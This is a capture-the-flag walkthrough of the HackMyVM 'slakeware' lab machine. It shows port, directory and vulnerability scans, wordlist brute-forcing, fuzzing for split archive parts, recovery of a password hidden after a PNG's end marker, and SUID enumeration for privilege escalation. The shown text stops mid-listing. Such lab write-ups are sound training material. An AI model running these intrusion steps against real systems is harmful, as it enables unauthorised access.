{"id":627,"date":"2024-04-25T22:57:18","date_gmt":"2024-04-25T14:57:18","guid":{"rendered":"http:\/\/162.14.82.114\/?p=627"},"modified":"2024-09-11T14:24:41","modified_gmt":"2024-09-11T06:24:41","slug":"hmv-_-slakeware","status":"publish","type":"post","link":"http:\/\/162.14.82.114\/index.php\/627\/04\/25\/2024\/","title":{"rendered":"hmv[-_-]slakeware"},"content":{"rendered":"<h1>slakeware<\/h1>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404252256370.png\" alt=\"image-20240425160707699\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404252256372.png\" alt=\"image-20240425161648293\" style=\"zoom:50%;\" \/><\/p>\n<h2>Information Gathering<\/h2>\n<h3>Port Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ rustscan -a 192.168.0.147 -- -A\n.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.\n| {}  }| { } |{ {__ {_   _}{ {__  \/  ___} \/ {} \\ |  `| |\n| .-. \\| {_} |.-._} } | |  .-._} }\\     }\/  \/\\  \\| |\\  |\n`-&#039; `-&#039;`-----&#039;`----&#039;  `-&#039;  `----&#039;  `---&#039; `-&#039;  `-&#039;`-&#039; `-&#039;\nThe Modern Day Port Scanner.\n________________________________________\n: https:\/\/discord.gg\/GFrQsGy           :\n: https:\/\/github.com\/RustScan\/RustScan :\n --------------------------------------\nNmap? More like slowmap.\ud83d\udc22\n\n[~] The config file is expected to be at &quot;\/home\/kali\/.rustscan.toml&quot;\n[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers\n[!] Your file limit is very small, which negatively impacts RustScan&#039;s speed. Use the Docker image, or up the Ulimit with &#039;--ulimit 5000&#039;. \nOpen 192.168.0.147:1\nOpen 192.168.0.147:2\n[~] Starting Script(s)\n[&gt;] Script to be run Some(&quot;nmap -vvv -p {{port}} {{ip}}&quot;)\n\n[~] Starting Nmap 7.94SVN ( https:\/\/nmap.org ) at 2024-04-25 04:17 EDT\nNSE: Loaded 156 scripts for scanning.\nNSE: Script Pre-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 04:17\nCompleted NSE at 04:17, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 04:17\nCompleted NSE at 04:17, 0.00s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 04:17\nCompleted NSE at 04:17, 0.00s elapsed\nInitiating Ping Scan at 04:17\nScanning 192.168.0.147 [2 ports]\nCompleted Ping Scan at 04:17, 0.00s elapsed (1 total hosts)\nInitiating Parallel DNS resolution of 1 host. at 04:17\nCompleted Parallel DNS resolution of 1 host. 
at 04:17, 0.01s elapsed\nDNS resolution of 1 IPs took 0.01s. Mode: Async [#: 1, OK: 1, NX: 0, DR: 0, SF: 0, TR: 1, CN: 0]\nInitiating Connect Scan at 04:17\nScanning slackware (192.168.0.147) [2 ports]\nDiscovered open port 1\/tcp on 192.168.0.147\nDiscovered open port 2\/tcp on 192.168.0.147\nCompleted Connect Scan at 04:17, 0.00s elapsed (2 total ports)\nInitiating Service scan at 04:17\nScanning 2 services on slackware (192.168.0.147)\nCompleted Service scan at 04:17, 11.08s elapsed (2 services on 1 host)\nNSE: Script scanning 192.168.0.147.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 04:17\nCompleted NSE at 04:17, 0.47s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 04:17\nCompleted NSE at 04:17, 0.01s elapsed\nNSE: Starting runlevel 3 (of 3) scan.\nInitiating NSE at 04:17\nCompleted NSE at 04:17, 0.00s elapsed\nNmap scan report for slackware (192.168.0.147)\nHost is up, received conn-refused (0.0014s latency).\nScanned at 2024-04-25 04:17:00 EDT for 12s\n\nPORT  STATE SERVICE REASON  VERSION\n1\/tcp open  ssh     syn-ack OpenSSH 9.3 (protocol 2.0)\n| ssh-hostkey: \n|   256 e2:66:60:79:bc:d1:33:2e:c1:25:fa:99:e5:89:1e:d3 (ECDSA)\n| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJcZY4GWIximmdPsABxAYaWgO1m0N7pVq2ce7e5tg7ll2XkNtrin7qN520RUcubKdKhR7uVcZS\/FsAg9ChHCgLE=\n|   256 98:59:c3:a8:2b:89:56:77:eb:72:4a:05:90:21:cb:40 (ED25519)\n|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIB3Vv5eWXgC7mWGGeXdd+jVBETQZmJs5JsPH\/51Tnxgh\n2\/tcp open  http    syn-ack Apache httpd 2.4.58 ((Unix))\n| http-methods: \n|   Supported Methods: HEAD GET POST OPTIONS TRACE\n|_  Potentially risky methods: TRACE\n|_http-server-header: Apache\/2.4.58 (Unix)\n|_http-title: Tribute to Slackware\n\nNSE: Script Post-scanning.\nNSE: Starting runlevel 1 (of 3) scan.\nInitiating NSE at 04:17\nCompleted NSE at 04:17, 0.00s elapsed\nNSE: Starting runlevel 2 (of 3) scan.\nInitiating NSE at 04:17\nCompleted NSE at 04:17, 0.00s elapsed\nNSE: Starting 
runlevel 3 (of 3) scan.\nInitiating NSE at 04:17\nCompleted NSE at 04:17, 0.00s elapsed\nRead data files from: \/usr\/bin\/..\/share\/nmap\nService detection performed. Please report any incorrect results at https:\/\/nmap.org\/submit\/ .\nNmap done: 1 IP address (1 host up) scanned in 12.39 seconds<\/code><\/pre>\n<h3>Directory Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.147:2\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html \n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.147:2\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              php,zip,bak,jpg,txt,html\n[+] Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/index.html           (Status: 200) [Size: 7511]\n\/.html                (Status: 403) [Size: 199]\n\/background.jpg       (Status: 200) [Size: 13798]\n\/robots.txt           (Status: 200) [Size: 21]\n\/.html                (Status: 403) [Size: 199]\n\/getslack             (Status: 301) [Size: 240] [--&gt; http:\/\/192.168.0.147:2\/getslack\/]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<pre><code 
class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ sudo dirsearch -u http:\/\/192.168.0.147:2\/ -e* -i 200,300-399 2&gt;\/dev\/null\n\n  _|. _ _  _  _  _ _|_    v0.4.3\n (_||| _) (\/_(_|| (_| )\n\nExtensions: php, jsp, asp, aspx, do, action, cgi, html, htm, js, tar.gz | HTTP method: GET | Threads: 25 | Wordlist size: 14594\n\nOutput File: \/home\/kali\/temp\/slakeware\/reports\/http_192.168.0.147_2\/__24-04-25_04-23-30.txt\n\nTarget: http:\/\/192.168.0.147:2\/\n\n[04:23:30] Starting: \n[04:23:44] 200 -    1KB - \/cgi-bin\/test-cgi\n[04:23:44] 200 -  820B  - \/cgi-bin\/printenv\n[04:24:00] 200 -   21B  - \/robots.txt\n\nTask Completed<\/code><\/pre>\n<h3>Vulnerability Scan<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ nikto -h http:\/\/192.168.0.147:2\n- Nikto v2.5.0\n---------------------------------------------------------------------------\n+ Target IP:          192.168.0.147\n+ Target Hostname:    192.168.0.147\n+ Target Port:        2\n+ Start Time:         2024-04-25 04:18:40 (GMT-4)\n---------------------------------------------------------------------------\n+ Server: Apache\/2.4.58 (Unix)\n+ \/: The anti-clickjacking X-Frame-Options header is not present. See: https:\/\/developer.mozilla.org\/en-US\/docs\/Web\/HTTP\/Headers\/X-Frame-Options\n+ \/: The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type. See: https:\/\/www.netsparker.com\/web-vulnerability-scanner\/vulnerabilities\/missing-content-type-header\/\n+ No CGI Directories found (use &#039;-C all&#039; to force check all possible dirs)\n+ OPTIONS: Allowed HTTP Methods: HEAD, GET, POST, OPTIONS, TRACE .\n+ \/: HTTP TRACE method is active which suggests the host is vulnerable to XST. 
See: https:\/\/owasp.org\/www-community\/attacks\/Cross_Site_Tracing\n+ 8101 requests: 0 error(s) and 4 item(s) reported on remote host\n+ End Time:           2024-04-25 04:18:56 (GMT-4) (16 seconds)\n---------------------------------------------------------------------------\n+ 1 host(s) tested<\/code><\/pre>\n<h2>Vulnerability Discovery<\/h2>\n<h3>Reconnaissance<\/h3>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404252256373.png\" alt=\"image-20240425161919370\" style=\"zoom:50%;\" \/><\/p>\n<p>Clicking around the site, I found:<\/p>\n<pre><code class=\"language-apl\">https:\/\/www.slackware.com\/infra\/keys\/GPG-KEY<\/code><\/pre>\n<pre><code class=\"language-bash\">security@slackware.com public key\n\npub   1024D\/40102233 2003-02-26 [expires: 2038-01-19]\nuid                  Slackware Linux Project &lt;security@slackware.com&gt;\nsub   1024g\/4E523569 2003-02-26 [expires: 2038-01-19]<\/code><\/pre>\n<p>But I had no idea what to do with it.<\/p>\n<h3>Brute-Force Attempts<\/h3>\n<p>The page has a lot of text, so first build a wordlist with <code>cewl<\/code>:<\/p>\n<pre><code class=\"language-bash\">cewl http:\/\/192.168.0.147:2\/ --with-numbers -d 3 -m 6 -w pass.txt<\/code><\/pre>\n<p>I left a brute-force run going in the background, but it got nowhere.<\/p>\n<p>I then collected the bold terms from the page and tried brute-forcing with those:<\/p>\n<pre><code class=\"language-apl\">1993\nPatrick Volkerding\nSlackware 15\nSlackware15\nLILO\nELILO\nifconfig\nSystem 
V\nReiserFS\neth0\nenp0s25f0u1c2i2\nslakeware15<\/code><\/pre>\n<p>That failed too.<\/p>\n<h3>Sensitive Directories<\/h3>\n<pre><code class=\"language-apl\">http:\/\/192.168.0.147:2\/robots.txt<\/code><\/pre>\n<pre><code class=\"language-bash\">User-agent: *\n#7z.001<\/code><\/pre>\n<pre><code class=\"language-apl\">http:\/\/192.168.0.147:2\/cgi-bin\/printenv<\/code><\/pre>\n<pre><code class=\"language-bash\">#\n\n# To permit this cgi, replace # on the first line above with the\n# appropriate #!\/path\/to\/perl shebang, and on Unix \/ Linux also\n# set this script executable with chmod 755.\n#\n# ***** !!! WARNING !!! *****\n# This script echoes the server environment variables and therefore\n# leaks information - so NEVER use it in a live server environment!\n# It is provided only for testing purpose.\n# Also note that it is subject to cross site scripting attacks on\n# MS IE and any other browser which fails to honor RFC2616. \n\n##\n##  printenv -- demo CGI program which just prints its environment\n##\nuse strict;\nuse warnings;\n\nprint &quot;Content-type: text\/plain; charset=iso-8859-1\\n\\n&quot;;\nforeach my $var (sort(keys(%ENV))) {\n    my $val = $ENV{$var};\n    $val =~ s|\\n|\\\\n|g;\n    $val =~ s|&quot;|\\\\&quot;|g;\n    print &quot;${var}=\\&quot;${val}\\&quot;\\n&quot;;\n}\n<\/code><\/pre>\n<pre><code class=\"language-apl\">http:\/\/192.168.0.147:2\/cgi-bin\/test-cgi<\/code><\/pre>\n<pre><code class=\"language-bash\">#\n\n# To permit this cgi, replace # on the first line above with the\n# appropriate #!\/path\/to\/sh shebang, and set this script executable\n# with chmod 755.\n#\n# ***** !!! WARNING !!! *****\n# This script echoes the server environment variables and therefore\n# leaks information - so NEVER use it in a live server environment!\n# It is provided only for testing purpose.\n# Also note that it is subject to cross site scripting attacks on\n# MS IE and any other browser which fails to honor RFC2616. 
\n\n# disable filename globbing\nset -f\n\necho &quot;Content-type: text\/plain; charset=iso-8859-1&quot;\necho\n\necho CGI\/1.0 test script report:\necho\n\necho argc is $#. argv is &quot;$*&quot;.\necho\n\necho SERVER_SOFTWARE = $SERVER_SOFTWARE\necho SERVER_NAME = $SERVER_NAME\necho GATEWAY_INTERFACE = $GATEWAY_INTERFACE\necho SERVER_PROTOCOL = $SERVER_PROTOCOL\necho SERVER_PORT = $SERVER_PORT\necho REQUEST_METHOD = $REQUEST_METHOD\necho HTTP_ACCEPT = &quot;$HTTP_ACCEPT&quot;\necho PATH_INFO = &quot;$PATH_INFO&quot;\necho PATH_TRANSLATED = &quot;$PATH_TRANSLATED&quot;\necho SCRIPT_NAME = &quot;$SCRIPT_NAME&quot;\necho QUERY_STRING = &quot;$QUERY_STRING&quot;\necho REMOTE_HOST = $REMOTE_HOST\necho REMOTE_ADDR = $REMOTE_ADDR\necho REMOTE_USER = $REMOTE_USER\necho AUTH_TYPE = $AUTH_TYPE\necho CONTENT_TYPE = $CONTENT_TYPE\necho CONTENT_LENGTH = $CONTENT_LENGTH<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ exiftool background.jpg \nExifTool Version Number         : 12.76\nFile Name                       : background.jpg\nDirectory                       : .\nFile Size                       : 14 kB\nFile Modification Date\/Time     : 2000:11:10 00:43:33-05:00\nFile Access Date\/Time           : 2024:04:25 05:04:56-04:00\nFile Inode Change Date\/Time     : 2024:04:25 05:04:56-04:00\nFile Permissions                : -rw-r--r--\nFile Type                       : JPEG\nFile Type Extension             : jpg\nMIME Type                       : image\/jpeg\nJFIF Version                    : 1.01\nResolution Unit                 : inches\nX Resolution                    : 72\nY Resolution                    : 72\nImage Width                     : 362\nImage Height                    : 242\nEncoding Process                : Progressive DCT, Huffman coding\nBits Per Sample                 : 8\nColor Components                : 3\nY Cb Cr Sub Sampling            : YCbCr4:2:0 (2 2)\nImage Size        
              : 362x242\nMegapixels                      : 0.088\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ stegseek -wl \/usr\/share\/wordlists\/rockyou.txt background.jpg \nStegSeek 0.6 - https:\/\/github.com\/RickdeJager\/StegSeek\n\n[i] Progress: 99.54% (132.8 MB)           \n[!] error: Could not find a valid passphrase.<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ curl http:\/\/192.168.0.147:2\/getslack                                                                                \n&lt;!DOCTYPE HTML PUBLIC &quot;-\/\/IETF\/\/DTD HTML 2.0\/\/EN&quot;&gt;\n&lt;html&gt;&lt;head&gt;\n&lt;title&gt;301 Moved Permanently&lt;\/title&gt;\n&lt;\/head&gt;&lt;body&gt;\n&lt;h1&gt;Moved Permanently&lt;\/h1&gt;\n&lt;p&gt;The document has moved &lt;a href=&quot;http:\/\/192.168.0.147:2\/getslack\/&quot;&gt;here&lt;\/a&gt;.&lt;\/p&gt;\n&lt;\/body&gt;&lt;\/html&gt;\n\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ curl http:\/\/192.168.0.147:2\/getslack\/\nsearch here<\/code><\/pre>\n<h3>FUZZ<\/h3>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ gobuster dir -u http:\/\/192.168.0.147:2\/getslack\/ -w \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt -x php,zip,bak,jpg,txt,html\n===============================================================\nGobuster v3.6\nby OJ Reeves (@TheColonial) &amp; Christian Mehlmauer (@firefart)\n===============================================================\n[+] Url:                     http:\/\/192.168.0.147:2\/getslack\/\n[+] Method:                  GET\n[+] Threads:                 10\n[+] Wordlist:                \/usr\/share\/wordlists\/dirbuster\/directory-list-2.3-medium.txt\n[+] Negative Status codes:   404\n[+] User Agent:              gobuster\/3.6\n[+] Extensions:              txt,html,php,zip,bak,jpg\n[+] 
Timeout:                 10s\n===============================================================\nStarting gobuster in directory enumeration mode\n===============================================================\n\/.html                (Status: 403) [Size: 199]\n\/index.html           (Status: 200) [Size: 12]\n\/.html                (Status: 403) [Size: 199]\nProgress: 1543920 \/ 1543927 (100.00%)\n===============================================================\nFinished\n===============================================================<\/code><\/pre>\n<p>Next, fuzz for a <code>7z.001<\/code> file name; in fact, someone in the group chat spotted this first!!!!<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404252256374.png\" alt=\"image-20240425171527882\" style=\"zoom:50%;\" \/><\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ wfuzz -w \/usr\/share\/seclists\/Discovery\/Web-Content\/raft-small-words-lowercase.txt -u http:\/\/192.168.0.147:2\/getslack\/FUZZ.7z.001 --hw 23 --sc 200\n \/usr\/lib\/python3\/dist-packages\/wfuzz\/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. 
Check Wfuzz&#039;s documentation for more information.\n********************************************************\n* Wfuzz 3.1.0 - The Web Fuzzer                         *\n********************************************************\n\nTarget: http:\/\/192.168.0.147:2\/getslack\/FUZZ.7z.001\nTotal requests: 38267\n\n=====================================================================\nID           Response   Lines    Word       Chars       Payload\n=====================================================================\n\n000001220:   200        80 L     794 W      19474 Ch    &quot;twitter&quot;\n\nTotal time: 31.73400\nProcessed Requests: 38267\nFiltered Requests: 38266\nRequests\/sec.: 1205.867<\/code><\/pre>\n<p>This is what you call result-oriented programming!<\/p>\n<p>Download the parts:<\/p>\n<pre><code class=\"language-bash\">for i in $(seq 1 20); do wget http:\/\/192.168.0.147:2\/getslack\/twitter.7z.00$i; done\nfor i in $(seq 1 20); do wget http:\/\/192.168.0.147:2\/getslack\/twitter.7z.0$i; done\n\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ ls -la\ntotal 300\ndrwxr-xr-x  3 kali kali  4096 Apr 25 05:28 .\ndrwxr-xr-x 69 kali kali  4096 Apr 25 04:16 ..\n-rw-r--r--  1 kali kali 13798 Nov 10  2000 background.jpg\n-rw-r--r--  1 kali kali  1497 Apr 25 04:22 pass.txt\ndrwxr-xr-x  3 root root  4096 Apr 25 04:23 reports\n-rw-r--r--  1 kali kali   114 Apr 25 04:44 temp.txt\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.001\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.002\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.003\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.004\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.005\n-rw-r--r--  1 
kali kali 20480 Mar 10 17:02 twitter.7z.006\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.007\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.008\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.009\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.010\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.011\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.012\n-rw-r--r--  1 kali kali 20480 Mar 10 17:02 twitter.7z.013\n-rw-r--r--  1 kali kali  1860 Mar 10 17:02 twitter.7z.014<\/code><\/pre>\n<h3>Extracting the Files<\/h3>\n<p>Extract the archive:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ 7z x twitter.7z.001\n\n7-Zip 23.01 (x64) : Copyright (c) 1999-2023 Igor Pavlov : 2023-06-20\n 64-bit locale=en_US.UTF-8 Threads:2 OPEN_MAX:1024\n\nScanning the drive for archives:\n1 file, 20480 bytes (20 KiB)\n\nExtracting archive: twitter.7z.001\n--\nPath = twitter.7z.001\nType = Split\nPhysical Size = 20480\nVolumes = 14\nTotal Physical Size = 268100\n----\nPath = twitter.7z\nSize = 268100\n--\nPath = twitter.7z\nType = 7z\nPhysical Size = 268100\nHeaders Size = 130\nMethod = LZMA2:384k\nSolid = -\nBlocks = 1\n\nEverything is Ok\n\nSize:       267951\nCompressed: 268100<\/code><\/pre>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ exiftool twitter.png\nExifTool Version Number         : 12.76\nFile Name                       : twitter.png\nDirectory                       : .\nFile Size                       : 268 kB\nFile Modification Date\/Time     : 2024:03:10 16:42:47-04:00\nFile Access Date\/Time           : 2024:04:25 05:31:09-04:00\nFile Inode Change Date\/Time     : 2024:04:25 05:31:09-04:00\nFile Permissions                : -rw-r--r--\nFile Type                       : PNG\nFile Type Extension             : png\nMIME Type              
         : image\/png\nImage Width                     : 400\nImage Height                    : 400\nBit Depth                       : 8\nColor Type                      : RGB\nCompression                     : Deflate\/Inflate\nFilter                          : Adaptive\nInterlace                       : Noninterlaced\nProfile Name                    : icc\nProfile CMM Type                : Little CMS\nProfile Version                 : 4.4.0\nProfile Class                   : Display Device Profile\nColor Space Data                : RGB\nProfile Connection Space        : XYZ\nProfile Date Time               : 2022:12:19 06:28:40\nProfile File Signature          : acsp\nPrimary Platform                : Apple Computer Inc.\nCMM Flags                       : Not Embedded, Independent\nDevice Manufacturer             : \nDevice Model                    : \nDevice Attributes               : Reflective, Glossy, Positive, Color\nRendering Intent                : Perceptual\nConnection Space Illuminant     : 0.9642 1 0.82491\nProfile Creator                 : Little CMS\nProfile ID                      : 0\nProfile Description             : GIMP built-in sRGB\nProfile Copyright               : Public Domain\nMedia White Point               : 0.9642 1 0.82491\nChromatic Adaptation            : 1.04788 0.02292 -0.05022 0.02959 0.99048 -0.01707 -0.00925 0.01508 0.75168\nRed Matrix Column               : 0.43604 0.22249 0.01392\nBlue Matrix Column              : 0.14305 0.06061 0.71393\nGreen Matrix Column             : 0.38512 0.7169 0.09706\nRed Tone Reproduction Curve     : (Binary data 32 bytes, use -b option to extract)\nGreen Tone Reproduction Curve   : (Binary data 32 bytes, use -b option to extract)\nBlue Tone Reproduction Curve    : (Binary data 32 bytes, use -b option to extract)\nChromaticity Channels           : 3\nChromaticity Colorant           : Unknown\nChromaticity Channel 1          : 0.64 0.33002\nChromaticity Channel 2          : 0.3 0.60001\nChromaticity 
Channel 3          : 0.15001 0.06\nDevice Mfg Desc                 : GIMP\nDevice Model Desc               : sRGB\nWhite Point X                   : 0.3127\nWhite Point Y                   : 0.329\nRed X                           : 0.64\nRed Y                           : 0.33\nGreen X                         : 0.3\nGreen Y                         : 0.6\nBlue X                          : 0.15\nBlue Y                          : 0.06\nWarning                         : [minor] Trailer data after PNG IEND chunk\nImage Size                      : 400x400\nMegapixels                      : 0.160<\/code><\/pre>\n<p>Let's see what is going on:<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/slakeware]\n\u2514\u2500$ tail twitter.png\ntrYth1sPasS1993<\/code><\/pre>\n<p>Take a look at the image:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404252256375.png\" alt=\"image-20240425174205430\" style=\"zoom:50%;\" \/><\/p>\n<p>Halfway through the brute force, <code>umz<\/code> came through with good news:<\/p>\n<p><img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404252256376.png\" alt=\"image-20240425174003292\" style=\"zoom:50%;\" \/><br \/>\n<img src=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202404252256377.png\" alt=\"image-20240425174257587\" style=\"zoom:50%;\" \/><\/p>\n<p>Great work!!!<\/p>\n<h2>Privilege Escalation<\/h2>\n<h3>Information Gathering<\/h3>\n<pre><code class=\"language-bash\">(remote) patrick@slackware.slackware.local:\/home\/patrick$ find \/ -perm -u=s -type f 
2&gt;\/dev\/null\n\/bin\/su\n\/bin\/ping\n\/bin\/mount\n\/bin\/umount\n\/bin\/ntfs-3g\n\/bin\/fusermount\n\/usr\/bin\/at\n\/usr\/bin\/cu\n\/usr\/bin\/ksu\n\/usr\/bin\/rcp\n\/usr\/bin\/rsh\n\/usr\/bin\/uux\n\/usr\/bin\/chfn\n\/usr\/bin\/chsh\n\/usr\/bin\/newuidmap\n\/usr\/bin\/sudo\n\/usr\/bin\/uucp\n\/usr\/bin\/crontab\n\/usr\/bin\/chage\n\/usr\/bin\/afppasswd\n\/usr\/bin\/fusermount3\n\/usr\/bin\/fdmount\n\/usr\/bin\/expiry\n\/usr\/bin\/newgrp\n\/usr\/bin\/passwd\n\/usr\/bin\/gpasswd\n\/usr\/bin\/pkexec\n\/usr\/bin\/rlogin\n\/usr\/bin\/uuname\n\/usr\/bin\/uustat\n\/usr\/bin\/procmail\n\/usr\/bin\/newgidmap\n\/usr\/lib\/polkit-1\/polkit-agent-helper-1\n\/usr\/sbin\/uuxqt\n\/usr\/sbin\/uucico\n\/usr\/libexec\/lxc\/lxc-user-nic\n\/usr\/libexec\/dbus-daemon-launch-helper\n\/usr\/libexec\/ssh-keysign\n\/sbin\/unix_chkpwd\n\/sbin\/mount.nfs\n(remote) patrick@slackware.slackware.local:\/home\/patrick$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n(remote) patrick@slackware.slackware.local:\/home\/patrick$ cd ..\n(remote) patrick@slackware.slackware.local:\/home$ ls -la\ntotal 2\ndrwxr-xr-x 54 root       root       1400 Mar 10 22:16 .\/\ndrwxr-xr-x 23 root       root        536 Mar 10 16:29 ..\/\ndrwxr-x---  2 0xeex75    0xeex75      80 Mar 10 22:15 0xeex75\/\ndrwxr-x---  2 0xh3rshel  0xh3rshel    80 Mar 11 12:41 0xh3rshel\/\ndrwxr-x---  2 0xjin      0xjin        80 Mar 10 22:16 0xjin\/\ndrwxr-x---  2 aceomn     ch4rm       112 Mar 10 22:15 aceomn\/\ndrwxr-x---  2 alienum    claor       112 Mar 10 22:15 alienum\/\ndrwxr-x---  2 annlynn    mrmidnight  112 Mar 10 22:15 annlynn\/\ndrwxr-x---  2 avijneyam  d3b0o       112 Mar 10 22:15 avijneyam\/\ndrwxr-x---  2 b4el7d     ziyos       112 Mar 10 22:15 b4el7d\/\ndrwxr-x---  2 bit        whitecr0wz  112 Mar 10 22:15 bit\/\ndrwxr-x---  2 boyras200  c4rta       112 Mar 10 22:15 boyras200\/\ndrwxr-x---  2 c4rta      kaian       112 Mar 10 22:15 c4rta\/\ndrwxr-x---  2 catch_me75 h1dr0       112 Mar 10 22:15 catch_me75\/\ndrwxr-x---  2 
ch4rm      gatogamer   112 Mar 10 22:15 ch4rm\/\ndrwxr-x---  2 claor      kretinga    112 Mar 10 22:15 claor\/\ndrwxr-x---  2 cromiphi   rijaba1     112 Mar 10 22:15 cromiphi\/\ndrwxr-x---  2 d3b0o      kerszi      112 Mar 10 22:15 d3b0o\/\ndrwxr-x---  2 emvee      sml         144 Mar 11 11:39 emvee\/\ndrwxr-x---  2 root       root         48 Dec 20 21:35 ftp\/\ndrwxr-x---  2 gatogamer  cromiphi    112 Mar 10 22:15 gatogamer\/\ndrwxr-x---  2 h1dr0      rpj7        112 Mar 10 22:15 h1dr0\/\ndrwxr-x---  2 icex64     x4v1l0k     112 Mar 10 22:15 icex64\/\ndrwxr-x---  2 infayerts  bit         112 Mar 10 22:15 infayerts\/\ndrwxr-x---  2 josemlwdf  catch_me75  112 Mar 10 22:15 josemlwdf\/\ndrwxr-x---  2 kaian      zayotic     112 Mar 10 22:15 kaian\/\ndrwxr-x---  2 kerszi     aceomn      112 Mar 10 22:15 kerszi\/\ndrwxr-x---  2 kretinga   patrick     112 Mar 10 22:15 kretinga\/\ndrwxr-x---  2 lanz       tasiyanci   112 Mar 10 22:15 lanz\/\ndrwxr-x---  2 mindsflee  icex64      112 Mar 10 22:15 mindsflee\/\ndrwxr-x---  2 mrmidnight alienum     112 Mar 10 22:15 mrmidnight\/\ndrwxr-x---  2 nls        emvee       112 Mar 10 22:15 nls\/\ndrwxr-x---  2 nolose     noname      112 Mar 10 22:15 nolose\/\ndrwxr-x---  2 noname     nls         112 Mar 10 22:15 noname\/\ndrwx--x--x  3 patrick    users       136 Apr 25 09:43 patrick\/\ndrwxr-x---  2 powerful   annlynn     112 Mar 10 22:15 powerful\/\ndrwxr-x---  2 proxy      powerful    112 Mar 10 22:15 proxy\/\ndrwxr-x---  2 pylon      lanz        112 Mar 10 22:15 pylon\/\ndrwxr-x---  2 rijaba1    infayerts   112 Mar 10 22:15 rijaba1\/\ndrwxr-x---  2 rpj7       b4el7d      136 Mar 11 12:47 rpj7\/\ndrwxr-x---  2 ruycr4ft   sancelisso  112 Mar 10 22:15 ruycr4ft\/\ndrwxr-x---  2 sancelisso nolose      112 Mar 10 22:15 sancelisso\/\ndrwxr-x---  2 skinny     josemlwdf   112 Mar 10 22:15 skinny\/\ndrwxr-x---  2 sml        zenmpi   